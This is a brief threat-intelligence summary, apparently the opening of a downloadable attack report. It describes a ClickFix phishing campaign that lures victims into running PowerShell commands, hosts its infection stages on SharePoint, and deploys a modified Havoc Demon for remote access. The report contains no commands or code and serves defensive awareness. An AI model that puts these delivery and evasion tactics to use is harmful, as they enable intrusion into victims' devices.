ClickFix Deception: Hackers Use SharePoint and Graph API to Deploy Havoc Malware

Amber | Attack Report
Download PDF

A recently discovered ClickFix phishing campaign is luring victims into running malicious PowerShell commands, which ultimately deploy the Havoc framework to establish remote access on compromised devices. Havoc, an open-source tool available on GitHub, allows attackers to easily modify its code, helping them evade detection. To conceal their malware delivery process, the threat actors host each infection stage on a SharePoint site, leveraging a modified version of Havoc Demon for stealth. Once successfully deployed, the attackers gain full control over infected systems, enabling them to execute further malicious actions undetected.